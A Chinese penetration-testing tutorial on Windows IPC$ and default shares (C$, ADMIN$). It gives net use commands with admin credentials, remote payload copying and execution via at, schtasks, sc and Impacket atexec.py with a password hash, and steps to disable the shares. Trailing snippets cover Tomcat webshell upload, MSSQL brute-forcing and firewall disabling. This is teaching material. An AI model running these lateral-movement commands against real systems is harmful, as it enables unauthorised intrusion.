IPC$共享和其他共享(C$、D$、Admin$)

VSole2021-09-15 23:11:00

常见共享命令

net use                               #查看本机建立的连接(本机连接其他机器)net session                           #查看本机建立的连接(其他机器连接的本机),需要administrator用户执行net share                             #查看本地开启的共享net share ipc$                        #开启ipc$共享net share ipc$ /del                   #删除ipc$共享net share admin$ /del                 #删除admin$共享net share c$ /del                     #删除C盘共享net share d$ /del                     #删除D盘共享net use * /del                        #删除所有连接
net use \\192.168.10.15                   #与192.168.10.15建立ipc空连接net use \\192.168.10.15\ipc$              #与192.168.10.15建立ipc空连接net use \\192.168.10.15\ipc$ /u:"" ""     #与192.168.10.15建立ipc空连接
net view \\192.168.10.15                  #查看远程主机开启的默认共享
net use \\192.168.10.15 /u:"administrator" "root"   #以administrator身份与192.168.10.15建立ipc连接net use \\192.168.10.15 /del              #删除建立的ipc连接
net time \\192.168.10.15                  #查看该主机上的时间
net use \\192.168.10.15\c$  /u:"administrator" "root"  #建立C盘共享dir \\192.168.10.15\c$                  #查看192.168.10.15C盘文件dir \\192.168.10.15\c$\user             #查看192.168.10.15C盘文件下的user目录dir \\192.168.10.15\c$\user\test.exe    #查看192.168.10.15C盘文件下的user目录下的test.exe文件net use \\192.168.10.15\c$  /del        #删除该C盘共享连接
net use k: \\192.168.10.15\c$  /u:"administrator" "root"  #将目标C盘映射到本地K盘net use k: /del                                           #删除该映射

IPC$

IPC$ (Internet Process Connection) 是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT2000在提供了 IPC$ 共享功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(C$、D$、E$……)和系统目录共享(Admin$)。所有的这些初衷都是为了方便管理员的管理。但好的初衷并不一定有好的收效,一些别有用心者会利用IPC$,访问共享资源,导出用户列表,并使用一些字典工具,进行密码探测。

为了配合IPC共享工作,Windows操作系统(不包括Windows 98系列)在安装完成后,自动设置共享的目录为:C盘、D盘、E盘、ADMIN目录(C:\Windows)等,即为ADMIN$、C$、D$、E$等,但要注意,这些共享是隐藏的,只有管理员能够对他们进行远程操作。

输入 net share 可以查看开启的共享。

输入 net share 可以查看开启的共享。

所有的共享都依赖于139或445端口。

IPC$的利用条件

1:开启了139、445端口

首先我们来了解一些基础知识:

  • SMB: (Server Message Block) Windows协议族,用于文件打印共享的服务;
  • NBT: (NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP协议的NETBIOS网络互联。
  • 在WindowsNT中SMB基于NBT实现,即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现

对于win2000客户端(发起端)来说:

  • 如果在允许NBT的情况下连接服务器时,客户端会同时尝试访问139和445端口,如果445端口有响应,那么就发送RST包给139端口断开连接,用455端口进行会话,当445端口无响应时,才使用139端口,如果两个端口都没有响应,则会话失败;
  • 如果在禁止NBT的情况下连接服务器时,那么客户端只会尝试访问445端口,如果445端口无响应,那么会话失败。

对于win2000服务器端来说:

  • 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放(LISTENING);
  • 如果禁止NBT,那么只有445端口开放。

我们建立的IPC会

话对端口的择同样遵守以上原则。显而易见,如果远程服务器没有监听或端口,会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有监听139或445端口,IPC会话是无法建立的。

2:目标主机开启了IPC$共享

默认共享是为了方便管理员进行远程管理而默认开启的,包括所有的逻辑盘(C$、D$等)和系统目录 winnt 或 windows(admin$)以及IPC$。这些共享默认是开启的。可以使用net share命令查看这些共享是否开启。

3:IPC连接报错

如果目标主机没有开放139或445端口,我们去使用IPC$连接的话,会提示找不到网络名。

IPC空连接

在介绍空会话之前,我们有必要了解一下一个安全会话是如何建立的。在Windows NT中,是使用 NTLM挑战响应机制认证。传送门——> NTLM认证方式(工作组环境中)

空会话是在没有信任的情况下与服务器建立的会话(即未提供用户名与密码)。那么建立空会话到底可以做什么呢?

利用IPC$,黑客甚至可以与目标主机建立一个空的连接,而无需用户名与密码(当然,对方机器必须开了IPC$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。建立了一个空的连接后,黑客可以获得不少的信息(而这些信息往往是入侵中必不可少的),访问部分共享,如果黑客能够以某一个具有一定权限的用户身份登陆的话,那么就会得到相应的权限。

建立IPC$空连接

建立IPC空连接net use \\192.168.10.15或 net use \\192.168.10.15   /u:""  ""或 net use \\192.168.10.15\ipc$  /u:""  ""

空连接可以做什么?(毫无作用)

在Windows2003以后,空连接什么权限都没有,也就是说并没有太大实质的用处。有些主机的 Administrator 管理员的密码为空,那么我们可以尝试使用下面的命令进行连接,但是大多数情况下服务器都阻止了使用空密码进行连接。

以前建立空会话可以获取一些有用的信息,但是现在空会话的权限很低,访问都被拒了

IPC$非空连接

建立IPC$非空连接net use \\192.168.10.131  /u:"administrator"  "密码"

IPC$非空连接可以做什么?

  • 使用管理员组内用户(administrator或其他管理员组内用户均可)建立IPC$连接,可以执行以下所有命令。
  • 使用普通用户建立IPC$连接,仅能执行查看时间命令:net time \192.168.10.131 ,其他命令均执行不了。

dir命令(查看文件和目录)

也可以直接在文件管理用命令:\192.168.10.131\c$ 查看对应的文件及目录,也可以增删改查

tasklist命令(查看进程)

tasklist /S 192.168.10.131 /U administrator -P 密码

at命令(计划命令,可反弹shell)

  • 查看目标系统时间:net time \192.168.10.131
  • 将本目录下的指定文件复制到目标系统中:copy vps.exe \192.168.10.131\c$
  • 使用at创建计划任务:at \192.168.10.131 17:00:00 C:\vps.exe
  • 清除at记录:at \192.168.10.131 作业ID /delete
  • 使用at命令执行,将执行结果写入本地文本文件,再使用type命令查看该文件的内容:at \192.168.10.131 17:00:00 cmd.exe /c "ipconfig > C:/1.txt "
  • 查看生成的1.txt文件:type \192.168.10.131\C$\1.txt

schtasks(计划任务)

Windows Vista、Windows Server 2008及之后版本的操作系统已经弃用at命令,而转为用schtasks命令。schtasks命令比 at 命令更灵活。在使用schtasks命令时,会在系统中留下日志文件:C:\Windows\Tasks\SchedLgU.txt

在目标主机上创建一个名为test的计划任务,启动程序为C:\vps.exe,启动权限为system,启动时间为每隔一小时启动一次schtasks /create /s 192.168.10.131 /tn test /sc HOURLY /mo 1 /tr c:\vps.exe /ru system /f
其他启动时间参数:/sc onlogon  用户登录时启动/sc onstart  系统启动时启动/sc onidle   系统空闲时启动
查询该test计划任务schtasks /query | findstr test
启动该test计划任务schtasks /run /s 192.168.10.131 /i /tn "test"
删除该test计划任务schtasks /delete /s 192.168.10.131 /tn "test" /f
sc命令创建计划任务copy test.exe \\192.168.10.20\c$sc \\192.168.10.20 create test binpath= "c:\test.exe"sc \\192.168.10.20 start testsc \\192.168.10.20 del test

Impacket中的atexec.py

Impacket中的atexec.py脚本,就是利用定时任务获取权限,该脚本的利用需要开启ipc$共享。这个脚本仅工作Windows>=Vista的系统上。这个样例能够通过任务计划服务(Task Scheduler)来在目标主机上实现命令执行,并返回命令执行后的输出结果 。

 ./atexec.py  xie/hack:x123456./@192.168.10.130  whoami ./atexec.py  xie/hack:@192.168.10.130  whoami  -hashes aada8eda23213c027743e6c498d751aa:b98e75b5ff7a3d3ff05e07f211ebe7a8

关闭IPC$共享及其他共享

既然ipc$有一定的危险性,而且对于我们大多数人来说是没啥用的,所以我们执行以下命令关闭共享

1、使用命令关闭:

net  share  ipc$    /delete              关闭ipc默认共享net  share  c$      /delete              关闭C盘默认共享net  share  admin$  /delete              关闭admin$默认共享

2、修改注册表关闭

限制IPC$缺省共享:

  • HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Lsa
  • Name:restrictanonymous
  • Type:REG_DWORD
  • Value:0x0(缺省) 0x1 匿名用户无法列举本机用户列表 0x2 匿名用户无法连接本机IPC$共享 说明:不建议使用2,否则可能会造成你的一些服务无法启动,如SQL Server。

IPC$连接失败的原因及常见错误号

连接失败原因

  • 用户名或密码错误
  • 目标主机没有开启IPC$共享
  • 不能成功连接目标主机的139、445端口
  • 命令输入错误

常见错误号

  • 错误号5:拒绝访问
  • 错误号51:Windows无法找到网络路径,及网络中存在问题
  • 错误号53:找不到网络路径,包括IP地址错误、目标未开机、目标的lanmanserver服务未启动,目标防火墙过滤了端口
  • 错误号67:找不到网络名,包括 lanmanworkstation 服务未启动,IPC$已被删除
  • 错误号1219:提供的凭据与已存在的凭据集冲突。例如已经和目标建立了IPC$连接,需要在删除后重新连接
  • 错误号1326:未知的用户名或错误的密码
  • 错误号1792:试图登录,但是网络登录服务没有启动,包括目标NetLogon服务未启动(连接域控制器时会出现此情况)
  • 错误号2242:此用户的密码已经过期。

版权申明:内容来源网络,版权归原创者所有。除非无法确认,我们都会标明作者及出处,如有侵权烦请告知,我们会立即删除并表示歉意。谢谢!

testipc
本作品采用《CC 协议》,转载必须注明作者和本文链接
本文会详细叙述客户端风控对抗的“边界值”在哪里,如果你是在做风控对抗 ,不管你是这场游戏中在演“猫”的角色还是“老鼠”的角色 。本文将站在上帝视角去讲解对应的“规则” 和“玩法”,以及如何实现角色转换。通过之前的系列文章,配合这篇文章希望每个小白玩家都能知道大厂是怎么玩的,如何设置游戏规则,我们应该如何进行解谜。而这个协议里面具体发送的内容,就是IPC协议装的“包裹”就是用的Parcel 。
IPC$ (Internet Process Connection) 是共享“命名管道”的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。
WEB安全梳理-操作系统
2022-08-10 07:16:03
WEB安全梳理-操作系统
0x01 弱口令YYDS在做资产梳理的时候发现了一个弱口令,是Tomcat中间件的后台管理弱口令,Tomcat的后台管理处是可以上传webshell的。在这里,我们需要上传一个war包,war包这样构造,首先选择一个JSP木马,将其命名为test.jsp,然后将该文件添加到压缩文件。注意是zip类型的压缩文件,然后我们把压缩文件重命名为test.war,然后使用冰蝎连接。
当获取了一台在域内的Windows服务器权限,就需要我们尽可能地去收集所能获取到的域的相关信息,收集的域的信息越多,拿下域控的成功率越高。
在2号机上右击,以管理员权限执行,kali就可以接收到反弹回来的shell,对shell进行操作。使用ms-sql-brute模块对6号机sa账户进行爆破,获得用户名为sa,密码为123456nmap -p 1433 --script ms-sql-brute --script-args userdb=C:\Users\Waldo1111test\Desktopame.txt,passdb=C:\Users\Waldo1111test\Desktop\password.txt 192.168.141.116. 使用sqltools获取6号机数据库用xp_cmdshell关闭防火墙限制netsh firewall set opmode mode=disable. 添加3389入站规则netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow. 抓到域控管理员账号和密码:在4号机上,使用以下命令建立IPC$连接net use \\192.168.141.100 "hb123456,./$" /user:"Administrator"
你知道怎么查看 IP 地址吗?
提权需要的东西有点儿多,笔记里出现的工具不建议在百度上下载。如果支持aspx,可以上传aspx,通过aspx大马,直接调用默认cmd扫描扫出了其他人的大马可以尝试用?
渗透测试的本质是信息收集,无论是web还是内网,信息收集的全面性都直接着影响到后续渗透工作。在进入内网后,需要判断当前网络环境和权限,为后续横向移动等工作做好铺垫,本篇文章主要针对windows系统下的信息收集。
VSole
网络安全专家